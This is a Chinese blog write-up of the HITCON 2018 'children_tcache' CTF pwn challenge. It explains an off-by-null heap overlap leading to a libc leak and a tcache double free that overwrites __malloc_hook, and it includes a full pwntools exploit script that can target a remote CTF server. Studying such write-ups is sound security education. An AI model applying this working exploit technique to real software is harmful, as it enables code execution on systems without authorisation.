hitcon_2018_children_tcache(tcache off-by-null,另一种doublefree)

hitcon_2018_children_tcache:

显然保护全开
请添加图片描述

请添加图片描述

逆向分析:

add函数:
漏洞在这个strcpy函数上
请添加图片描述

delete函数:
da是垃圾数据,阻碍我们漏洞利用,我们后面要利用strcpy的\x00循环一个一个清理prevsize所在的地方为\x00
请添加图片描述

show函数:

在这里插入图片描述

大致思路:

由于有off-by-null 我们可以改size的prev in use位为0,我们可以利用unssortbin合并堆块,
造成堆块复用
泄露libc地址,用doublefree,改malloc_hook为onegadget

具体步骤:

1.先申请4个堆块

chunk0 unsorted bin,这题有tcache,大于0x410可以绕过
chunk1 	
chunk2 unsorted bin,这题有tcache,大于0x410可以绕过
chunk3 防止合并

2.释放chunk0,为合并做准备

3.我们释放chunk1,再申请chunk1回来,填满数据,修改chunk2的prev in use位为0
由于free时会在prev size处填da,我们也需要控制prev size
所以循环一个一个字节一次清零,清零后我们填入prev size为chunk0+chunk1大小的和

到这里,我们已经布置好合并所需的条件了,然后用delete chunk2触发
(虽然合并了,但是chunk1里的指针还在,合并操作并没有清零指针)

4.我们申请和chunk0一样大小的chunk,就会从合并的unsortbin中割一块,然后有main_arena+96地址就对应下移到了chunk1的fd与bk处,由于指针还在,我们就能show出来,相应计算出libc_base,__malloc_hook,onegadget

5.我们再申请chunk1大小的size,在bss指针里就有了两个指向chunk1的指针了
我们就可以doublefree,然后我们利用doublefree改hook为og

小结:

利用offbynull,伪造了合并,释放,但bss段的指针并没有清零掉,造成了另一种uaf,doublefree
(仅为个人观点)

exp:

from pwn import *
from LibcSearcher import *
local_file  = './HITCON_2018_children_tcache'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29418 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]

def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------
def add(size,content):
    sla('Your choice: ','1')
    sla('Size',str(size))
    sa('Data:',content)
def show(index):
    sla('Your choice: ','2')
    sla('Index:',str(index))
def delete(index):
    sla('Your choice: ','3')
    sla('Index:',str(index))
#----------------------------------
add(0x500,'a')#
add(0x68,'a')#
add(0x5f0,'a')#
add(0x20,'a')#3
delete(1)
delete(0)
for i in range(9):
    add(0x68 - i, 'b' * (0x68 - i))#
    delete(0)
add(0x68, 'b'*0x60+p64(0x580))#0
delete(2)
#debug()
add(0x508, 'a'*0x507)#1
#debug()
show(0)
libc_base=uu64(rc(6))-96-0x10-libc.sym['__malloc_hook']
print hex(libc_base)
og=[0x4f2c5,0x4f322,0x10a38c]
onegadget=libc_base+og[1]
#----------------------------------
add(0x68,'b'*0x67)#
delete(0)
delete(2)
add(0x60,p64(libc_base+libc.sym['__malloc_hook']))#
add(0x60,'a')
add(0x60,p64(onegadget))
sla('Your choice: ','1')
sla('Size','99')
#debug()
r.interactive()

参考师傅:
https://blog.csdn.net/weixin_44145820/article/details/105433911

https://blog.csdn.net/yongbaoii/article/details/114608875

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值